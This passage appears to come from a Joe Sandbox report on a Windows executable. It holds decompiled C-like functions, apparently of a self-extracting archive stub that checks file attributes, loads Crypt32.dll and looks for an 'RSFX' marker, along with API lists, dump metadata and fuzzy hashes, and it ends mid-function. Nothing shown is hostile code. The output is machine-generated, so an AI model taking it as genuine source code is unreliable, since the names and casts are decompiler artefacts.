                				 *0x403278(_t5, _t13, _t16,  *[fs:0x0], 0x402641, 0xffffffff);
                				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
                				L003EEB32(); // executed
                				_t8 =  *0x433178( *((intOrPtr*)(__ecx + 4))); // executed
                				 *[fs:0x0] = _v16;
                				return _t8;
                			}

                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,?,00402641,000000FF), ref: 003EACB0
                • OleUninitialize.OLE32(?,?,?,?,00402641,000000FF), ref: 003EACB5
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                • Opcode ID: a694555a835eb92c6ef904fd8903cf998f0b9d7fcf9be37584d036fddc79a280
                • Instruction ID: 7db94683ea7c82e76529538d60071e713e2e8c40fcb9bd0049bc31340f15d546
                • Opcode Fuzzy Hash: a694555a835eb92c6ef904fd8903cf998f0b9d7fcf9be37584d036fddc79a280
                • Instruction Fuzzy Hash: B5E06572504650EFCB019F59DD06B45FBACFB48B20F10437AF416D37A0CBB46840CA94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DA243(WCHAR* _a4) {
                				short _v4100;
                				long _t7;
                				long _t12;
                				long _t13;
                
                				E003EEC50(0x1000);
                				_t7 = GetFileAttributesW(_a4); // executed
                				_t13 = _t7;
                				if(_t13 == 0xffffffff && E003DBB03(_a4,  &_v4100, 0x800) != 0) {
                					_t12 = GetFileAttributesW( &_v4100); // executed
                					_t13 = _t12;
                				}
                				return _t13;
                			}

                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,003DA23A,?,003D755C,?,?,?,?), ref: 003DA254
                  • Part of subcall function 003DBB03: _wcslen.LIBCMT ref: 003DBB27
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,003DA23A,?,003D755C,?,?,?,?), ref: 003DA280
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AttributesFile$_wcslen
                • String ID:
                • API String ID: 2673547680-0
                • Opcode ID: 7884cbc2251b38b9e59a92c16fc7f167cd9a22e1f22d9da019462ce7e51e272d
                • Instruction ID: 250926030b5458df37116dd37269505fdce214c636108ab6520f3b78cd5ec67d
                • Opcode Fuzzy Hash: 7884cbc2251b38b9e59a92c16fc7f167cd9a22e1f22d9da019462ce7e51e272d
                • Instruction Fuzzy Hash: 02E092325001249BDB22AB64DD05BD9BB5CAB093E2F054672FD54E7294D770DE44CAA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EDEC2(void* __eflags, intOrPtr _a4, signed char _a16) {
                				short _v5124;
                				signed int _t16;
                
                				E003EEC50(0x1400);
                				E003D4092( &_v5124, 0xa00, E003DE617((_a16 & 0x000000ff) + 0x65), _a4);
                				SetDlgItemTextW( *0x418458, 0x65,  &_v5124); // executed
                				_t16 = E003EB568(); // executed
                				return _t16 & 0xffffff00 |  *0x418454 == 0x00000000;
                			}

                APIs
                • _swprintf.LIBCMT ref: 003EDEEC
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • SetDlgItemTextW.USER32(00000065,?), ref: 003EDF03
                  • Part of subcall function 003EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EB579
                  • Part of subcall function 003EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB58A
                  • Part of subcall function 003EB568: IsDialogMessageW.USER32(000303F2,?), ref: 003EB59E
                  • Part of subcall function 003EB568: TranslateMessage.USER32(?), ref: 003EB5AC
                  • Part of subcall function 003EB568: DispatchMessageW.USER32(?), ref: 003EB5B6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                • String ID:
                • API String ID: 2718869927-0
                • Opcode ID: e01ccc5ae16ac7672f8e15f74206a8bf5a91dc2bfe5359cf9ff9abb905f81acf
                • Instruction ID: 63a4cc4da5202fc542842b44be4dd02906e6174f00be4095f388c24555c6acb6
                • Opcode Fuzzy Hash: e01ccc5ae16ac7672f8e15f74206a8bf5a91dc2bfe5359cf9ff9abb905f81acf
                • Instruction Fuzzy Hash: 79E092B650029826DF03AB61DC06FDE3B6C5B05785F044866B240DE1E2EA78EA148665
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003E081B(intOrPtr _a4) {
                				short _v4100;
                				int _t8;
                				struct HINSTANCE__* _t12;
                
                				E003EEC50(0x1000);
                				_t8 = GetSystemDirectoryW( &_v4100, 0x800);
                				_t14 = _t8;
                				if(_t8 != 0) {
                					E003DBDF3(_t14,  &_v4100, _a4,  &_v4100, 0x800);
                					_t12 = LoadLibraryW( &_v4100); // executed
                					return _t12;
                				}
                				return _t8;
                			}

                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003E0836
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003DF2D8,Crypt32.dll,00000000,003DF35C,?,?,003DF33E,?,?,?), ref: 003E0858
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: 5ba115bb6fed5e6581311e6fbfe8a3f60006564431d0acc0ab55ff4c0008e126
                • Instruction ID: ccc4111ff520f6ec8adf1f36e50e5605700a1f0c9120ca99d602a7f1f37b0a72
                • Opcode Fuzzy Hash: 5ba115bb6fed5e6581311e6fbfe8a3f60006564431d0acc0ab55ff4c0008e126
                • Instruction Fuzzy Hash: 21E048764011686BDF11AB95DD05FDA7BACEF0D3D2F040075B645E2148D6B4DA84CBB4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E003EA3B9(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				signed int* _t10;
                				signed int _t15;
                
                				_push(__ecx);
                				_t15 = __ecx;
                				_t10 =  &_v8;
                				_v8 = __ecx;
                				_v8 = _v8 & 0x00000000;
                				_push(_t10);
                				_push(_a4);
                				 *__ecx = 0x404740;
                				if(_a8 == 0) {
                					L003EEB1A(); // executed
                				} else {
                					L003EEB20();
                				}
                				 *((intOrPtr*)(_t15 + 8)) = _t10;
                				 *(_t15 + 4) = _v8;
                				return _t15;
                			}

                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 003EA3DA
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 003EA3E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: 0841e33c7fdd1da80e885deeb99a995bb35018853d1ffa1f007e5bc7f0ebf03e
                • Instruction ID: 416074c9d26596644fc6808726568d72cd403c8d53b23eda7d5652ae60df70d0
                • Opcode Fuzzy Hash: 0841e33c7fdd1da80e885deeb99a995bb35018853d1ffa1f007e5bc7f0ebf03e
                • Instruction Fuzzy Hash: CEE0ED75904268EBCB11DF56C541699BBE8EB04360F20C15AA84697281E374AE04DB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E003F2B8C(void* __ecx, void* __eflags) {
                				intOrPtr _t1;
                				void* _t2;
                				void* _t7;
                				void* _t9;
                
                				_t1 = E003F3C57(__ecx, __eflags, E003F2AD0); // executed
                				 *0x40e7d0 = _t1;
                				_pop(_t7);
                				if(_t1 != 0xffffffff) {
                					_t2 = E003F3D08(_t7, __eflags, _t1, 0x432060);
                					_pop(_t9);
                					__eflags = _t2;
                					if(_t2 != 0) {
                						return 1;
                					} else {
                						E003F2BBF(_t9);
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}

                APIs
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003F2BAA
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 003F2BB5
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptd
                • String ID:
                • API String ID: 1660781231-0
                • Opcode ID: 9123392b4d539981ebdd97421b62a166c361f4cac4dbf2b588f5c4ef70dc6688
                • Instruction ID: c4ea2bae3c4af731ed35346770654475c90a7e9fd7d34c0507aa2bea086efefb
                • Opcode Fuzzy Hash: 9123392b4d539981ebdd97421b62a166c361f4cac4dbf2b588f5c4ef70dc6688
                • Instruction Fuzzy Hash: 0FD0223415830CD89C1B2F712A075BB3759ED41B71BF1169BFF20AE9C1EF208840A415
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E003D12F1(struct HWND__* _a4, int _a8, signed char _a12) {
                				int _t8;
                
                				asm("sbb eax, eax");
                				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
                				return _t8;
                			}




                0x003d12f8
                0x003d130d
                0x003d1313

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: 3e741f6237c5e71cc8733df8fb088e7b7818a972868b26bd2d683a0f8a364121
                • Instruction ID: 6aa3762ec7f38cdceb7ed01462c1df670c8193511c4acc0aef68c4a9e3f642d7
                • Opcode Fuzzy Hash: 3e741f6237c5e71cc8733df8fb088e7b7818a972868b26bd2d683a0f8a364121
                • Instruction Fuzzy Hash: 3FC0123205C200BEDF010FB4DC09C2BBBA8ABA5312F04C928B4A5C0060C238C910DB11
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 62%
                			E003D1A04(intOrPtr* __ecx, void* __edx) {
                				void* __esi;
                				char _t101;
                				signed int _t103;
                				intOrPtr _t107;
                				signed int _t109;
                				signed int _t111;
                				signed int _t113;
                				signed int _t114;
                				void* _t119;
                				signed int _t125;
                				intOrPtr _t126;
                				char _t127;
                				char _t137;
                				intOrPtr _t142;
                				signed int _t143;
                				void* _t146;
                				signed int _t151;
                				signed int _t155;
                				void* _t160;
                				void* _t162;
                				void* _t166;
                				intOrPtr* _t167;
                				signed int _t181;
                				void* _t182;
                				signed int _t184;
                				char* _t198;
                				intOrPtr _t199;
                				signed int _t200;
                				void* _t210;
                				void* _t211;
                				intOrPtr _t212;
                				void* _t214;
                				char* _t215;
                				intOrPtr _t216;
                				void* _t217;
                				void* _t224;
                				void* _t226;
                
                				_t210 = __edx;
                				E003EEB78(0x40265a, _t226);
                				_t167 = __ecx;
                				_t212 = 7;
                				 *((char*)(__ecx + 0x6cd4)) = 0;
                				 *((char*)(__ecx + 0x6cdc)) = 0;
                				 *0x403278(__ecx + 0x2210, _t212, _t211, _t217, _t166);
                				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xc))))() != _t212) {
                					L23:
                					_t101 = 0;
                					L24:
                					 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
                					return _t101;
                				}
                				_t220 = 0;
                				 *((intOrPtr*)(__ecx + 0x6cd8)) = 0;
                				_t103 = E003D1DF8(__ecx + 0x2210, _t212);
                				if(_t103 == 0) {
                					E003D13BA(_t226 - 0x38, 0x200000);
                					 *(_t226 - 4) = 0;
                					 *0x403278();
                					_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
                					 *((intOrPtr*)(_t226 - 0x18)) = _t107;
                					 *0x403278( *((intOrPtr*)(_t226 - 0x38)),  *((intOrPtr*)(_t226 - 0x34)) + 0xfffffff0);
                					_t109 =  *( *_t167 + 0xc)();
                					_t181 = _t109;
                					_t220 = 0;
                					 *(_t226 - 0x14) = _t181;
                					__eflags = _t181;
                					if(_t181 <= 0) {
                						L21:
                						__eflags =  *(_t167 + 0x6cd8);
                						_t182 = _t226 - 0x38;
                						if( *(_t167 + 0x6cd8) != 0) {
                							_t38 = _t226 - 4; // executed
                							 *_t38 =  *(_t226 - 4) | 0xffffffff;
                							__eflags =  *_t38;
                							E003D15FB(_t182); // executed
                							L26:
                							_t111 =  *(_t167 + 0x6cc8);
                							_t234 = _t111 - 4;
                							if(_t111 != 4) {
                								__eflags = _t111 - 3;
                								if(_t111 != 3) {
                									L32:
                									 *((intOrPtr*)(_t167 + 0x2218)) = _t212;
                									 *((char*)(_t226 - 0xd)) = 0;
                									_t113 = E003D3B2D(_t167, _t210, _t220);
                									__eflags = _t113;
                									 *((char*)(_t226 - 0xe)) = _t113 != 0;
                									__eflags = _t113;
                									if(_t113 == 0) {
                										L38:
                										_t114 =  *((intOrPtr*)(_t226 - 0xd));
                										L39:
                										_t184 =  *((intOrPtr*)(_t167 + 0x6cdd));
                										__eflags = _t184;
                										if(_t184 == 0) {
                											L41:
                											__eflags =  *((char*)(_t167 + 0x6cdc));
                											if( *((char*)(_t167 + 0x6cdc)) != 0) {
                												L43:
                												__eflags = _t184;
                												if(__eflags == 0) {
                													E003D138B(__eflags, 0x1b, _t167 + 0x32);
                												}
                												__eflags =  *((char*)(_t226 + 8));
                												if( *((char*)(_t226 + 8)) == 0) {
                													goto L23;
                												} else {
                													L46:
                													__eflags =  *((char*)(_t226 - 0xe));
                													 *((char*)(_t167 + 0x6cce)) =  *((intOrPtr*)(_t167 + 0x223c));
                													if( *((char*)(_t226 - 0xe)) == 0) {
                														L69:
                														__eflags =  *((char*)(_t167 + 0x6ccd));
                														if( *((char*)(_t167 + 0x6ccd)) == 0) {
                															L71:
                															E003E0602(_t167 + 0x6d12, _t167 + 0x32, 0x800);
                															L72:
                															_t101 = 1;
                															goto L24;
                														}
                														__eflags =  *((char*)(_t167 + 0x6cd1));
                														if( *((char*)(_t167 + 0x6cd1)) == 0) {
                															goto L72;
                														}
                														goto L71;
                													}
                													__eflags =  *((char*)(_t167 + 0x21f8));
                													if( *((char*)(_t167 + 0x21f8)) == 0) {
                														L49:
                														__eflags =  *((intOrPtr*)(_t167 + 0x10)) - 1;
                														if( *((intOrPtr*)(_t167 + 0x10)) == 1) {
                															goto L69;
                														}
                														 *0x403278();
                														_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
                														_t224 = _t119;
                														_t214 = _t210;
                														 *((intOrPtr*)(_t226 - 0x18)) =  *((intOrPtr*)(_t167 + 0x6cb8));
                														 *(_t226 - 0x14) =  *(_t167 + 0x6cbc);
                														 *((intOrPtr*)(_t226 - 0x1c)) =  *((intOrPtr*)(_t167 + 0x6cc0));
                														 *((intOrPtr*)(_t226 - 0x20)) =  *((intOrPtr*)(_t167 + 0x6cc4));
                														 *((intOrPtr*)(_t226 - 0x24)) =  *((intOrPtr*)(_t167 + 0x21f4));
                														while(1) {
                															_t125 = E003D3B2D(_t167, _t210, _t224);
                															__eflags = _t125;
                															if(_t125 == 0) {
                																break;
                															}
                															_t126 =  *((intOrPtr*)(_t167 + 0x21f4));
                															__eflags = _t126 - 3;
                															if(_t126 != 3) {
                																__eflags = _t126 - 2;
                																if(_t126 == 2) {
                																	__eflags =  *((char*)(_t167 + 0x6ccd));
                																	if( *((char*)(_t167 + 0x6ccd)) == 0) {
                																		L66:
                																		_t127 = 0;
                																		__eflags = 0;
                																		L67:
                																		 *((char*)(_t167 + 0x6cd1)) = _t127;
                																		L68:
                																		 *((intOrPtr*)(_t167 + 0x6cb8)) =  *((intOrPtr*)(_t226 - 0x18));
                																		 *(_t167 + 0x6cbc) =  *(_t226 - 0x14);
                																		 *((intOrPtr*)(_t167 + 0x6cc0)) =  *((intOrPtr*)(_t226 - 0x1c));
                																		 *((intOrPtr*)(_t167 + 0x6cc4)) =  *((intOrPtr*)(_t226 - 0x20));
                																		 *((intOrPtr*)(_t167 + 0x21f4)) =  *((intOrPtr*)(_t226 - 0x24));
                																		 *0x403278(_t224, _t214, 0);
                																		 *( *( *_t167 + 0x10))();
                																		goto L69;
                																	}
                																	__eflags =  *((char*)(_t167 + 0x3330));
                																	if( *((char*)(_t167 + 0x3330)) != 0) {
                																		goto L66;
                																	}
                																	_t127 = 1;
                																	goto L67;
                																}
                																__eflags = _t126 - 5;
                																if(_t126 == 5) {
                																	goto L68;
                																}
                																L60:
                																E003D1F47(_t167);
                																continue;
                															}
                															__eflags =  *((char*)(_t167 + 0x6ccd));
                															if( *((char*)(_t167 + 0x6ccd)) == 0) {
                																L56:
                																_t137 = 0;
                																__eflags = 0;
                																L57:
                																 *((char*)(_t167 + 0x6cd1)) = _t137;
                																goto L60;
                															}
                															__eflags =  *((char*)(_t167 + 0x5680));
                															if( *((char*)(_t167 + 0x5680)) != 0) {
                																goto L56;
                															}
                															_t137 = 1;
                															goto L57;
                														}
                														goto L68;
                													}
                													__eflags =  *((char*)(_t167 + 0x6cd4));
                													if( *((char*)(_t167 + 0x6cd4)) != 0) {
                														goto L69;
                													}
                													goto L49;
                												}
                											}
                											__eflags = _t114;
                											if(_t114 != 0) {
                												goto L46;
                											}
                											goto L43;
                										}
                										__eflags =  *((char*)(_t226 + 8));
                										if( *((char*)(_t226 + 8)) == 0) {
                											goto L23;
                										}
                										goto L41;
                									}
                									__eflags = 0;
                									 *((char*)(_t226 - 0xd)) = 0;
                									while(1) {
                										E003D1F47(_t167);
                										_t142 =  *((intOrPtr*)(_t167 + 0x21f4));
                										__eflags = _t142 - 1;
                										if(_t142 == 1) {
                											break;
                										}
                										__eflags =  *((char*)(_t167 + 0x21f8));
                										if( *((char*)(_t167 + 0x21f8)) == 0) {
                											L37:
                											_t143 = E003D3B2D(_t167, _t210, _t220);
                											__eflags = _t143;
                											 *((char*)(_t226 - 0xe)) = _t143 != 0;
                											__eflags = _t143;
                											if(_t143 != 0) {
                												continue;
                											}
                											goto L38;
                										}
                										__eflags = _t142 - 4;
                										if(_t142 == 4) {
                											break;
                										}
                										goto L37;
                									}
                									_t114 = 1;
                									goto L39;
                								}
                								_t215 = _t167 + 0x2217;
                								_t220 =  *( *_t167 + 0xc);
                								 *0x403278(_t215, 1);
                								_t146 =  *( *( *_t167 + 0xc))();
                								__eflags = _t146 - 1;
                								if(_t146 != 1) {
                									goto L23;
                								}
                								__eflags =  *_t215;
                								if( *_t215 != 0) {
                									goto L23;
                								}
                								_t212 = 8;
                								goto L32;
                							}
                							E003D138B(_t234, 0x3c, _t167 + 0x32);
                							goto L23;
                						}
                						E003D15FB(_t182);
                						goto L23;
                					} else {
                						goto L5;
                					}
                					do {
                						L5:
                						_t198 =  *((intOrPtr*)(_t226 - 0x38)) + _t220;
                						__eflags =  *_t198 - 0x52;
                						if( *_t198 != 0x52) {
                							goto L16;
                						}
                						_t151 = E003D1DF8(_t198, _t109 - _t220);
                						__eflags = _t151;
                						if(_t151 == 0) {
                							L15:
                							_t109 =  *(_t226 - 0x14);
                							goto L16;
                						}
                						_t199 =  *((intOrPtr*)(_t226 - 0x18));
                						 *(_t167 + 0x6cc8) = _t151;
                						__eflags = _t151 - 1;
                						if(_t151 != 1) {
                							L18:
                							_t200 = _t199 + _t220;
                							 *(_t167 + 0x6cd8) = _t200;
                							_t220 =  *( *_t167 + 0x10);
                							 *0x403278(_t200, 0, 0);
                							 *( *( *_t167 + 0x10))();
                							_t155 =  *(_t167 + 0x6cc8);
                							__eflags = _t155 - 2;
                							if(_t155 == 2) {
                								L20:
                								_t220 =  *( *_t167 + 0xc);
                								 *0x403278(_t167 + 0x2210, _t212);
                								 *( *( *_t167 + 0xc))();
                								goto L21;
                							}
                							__eflags = _t155 - 3;
                							if(_t155 != 3) {
                								goto L21;
                							}
                							goto L20;
                						}
                						__eflags = _t220;
                						if(_t220 <= 0) {
                							goto L18;
                						}
                						__eflags = _t199 - 0x1c;
                						if(_t199 >= 0x1c) {
                							goto L18;
                						}
                						__eflags =  *(_t226 - 0x14) - 0x1f;
                						if( *(_t226 - 0x14) <= 0x1f) {
                							goto L18;
                						}
                						_t160 =  *((intOrPtr*)(_t226 - 0x38)) - _t199;
                						__eflags =  *((char*)(_t160 + 0x1c)) - 0x52;
                						if( *((char*)(_t160 + 0x1c)) != 0x52) {
                							goto L15;
                						}
                						__eflags =  *((char*)(_t160 + 0x1d)) - 0x53;
                						if( *((char*)(_t160 + 0x1d)) != 0x53) {
                							goto L15;
                						}
                						__eflags =  *((char*)(_t160 + 0x1e)) - 0x46;
                						if( *((char*)(_t160 + 0x1e)) != 0x46) {
                							goto L15;
                						}
                						__eflags =  *((char*)(_t160 + 0x1f)) - 0x58;
                						if( *((char*)(_t160 + 0x1f)) == 0x58) {
                							goto L18;
                						}
                						goto L15;
                						L16:
                						_t220 = _t220 + 1;
                						__eflags = _t220 - _t109;
                					} while (_t220 < _t109);
                					goto L21;
                				}
                				 *(_t167 + 0x6cc8) = _t103;
                				if(_t103 == 1) {
                					_t216 =  *_t167;
                					_t220 =  *(_t216 + 0x14);
                					 *0x403278(0);
                					_t162 =  *( *(_t216 + 0x14))();
                					asm("sbb edx, 0x0");
                					 *0x403278(_t162 - 7, __edx);
                					 *((intOrPtr*)(_t216 + 0x10))();
                					_t212 = 7;
                				}
                				goto L26;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6f1a927a837b2cf66591679cf78917714f1415bf957a9a7f5cc0574f0455c8da
                • Instruction ID: 9cb6af0b6c7a0be6a5ba603dfe5dcddb00434ef498236188e16dd92edc39c60a
                • Opcode Fuzzy Hash: 6f1a927a837b2cf66591679cf78917714f1415bf957a9a7f5cc0574f0455c8da
                • Instruction Fuzzy Hash: C4C1B372A00254BFEF16CF68D484BB97BA6AF15310F0901BBEC459F396DB709944CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E003D3BBA(void* __ecx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				char _t79;
                				signed int _t86;
                				intOrPtr _t91;
                				intOrPtr _t96;
                				void* _t124;
                				char _t125;
                				intOrPtr _t133;
                				signed int _t135;
                				intOrPtr _t149;
                				signed int _t152;
                				void* _t155;
                				void* _t157;
                
                				E003EEB78(0x4026da, _t157);
                				E003EEC50(0xe6e0);
                				_t155 = __ecx;
                				_t160 =  *((char*)(__ecx + 0x6cdc));
                				if( *((char*)(__ecx + 0x6cdc)) == 0) {
                					__eflags =  *((char*)(__ecx + 0x4608)) - 5;
                					if(__eflags > 0) {
                						L26:
                						E003D138B(__eflags, 0x1e, _t155 + 0x32);
                						goto L27;
                					}
                					__eflags =  *((intOrPtr*)(__ecx + 0x6cc8)) - 3;
                					__eflags =  *((intOrPtr*)(__ecx + 0x4604)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cc8)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
                					if(__eflags > 0) {
                						goto L26;
                					}
                					_t86 =  *(__ecx + 0x5640) |  *(__ecx + 0x5644);
                					__eflags = _t86;
                					if(_t86 != 0) {
                						L7:
                						_t124 = _t155 + 0x20f8;
                						E003DCFD4(_t86, _t124);
                						_push(_t124);
                						E003E2089(_t157 - 0xe6ec, __eflags);
                						_t125 = 0;
                						_push(0);
                						_push( *((intOrPtr*)(_t155 + 0x56dc)));
                						 *((intOrPtr*)(_t157 - 4)) = 0;
                						E003E3377(0, _t157 - 0xe6ec);
                						_t152 =  *(_t157 + 8);
                						__eflags =  *(_t157 + 0xc);
                						if( *(_t157 + 0xc) != 0) {
                							L15:
                							__eflags =  *((intOrPtr*)(_t155 + 0x5683)) - _t125;
                							if( *((intOrPtr*)(_t155 + 0x5683)) == _t125) {
                								L18:
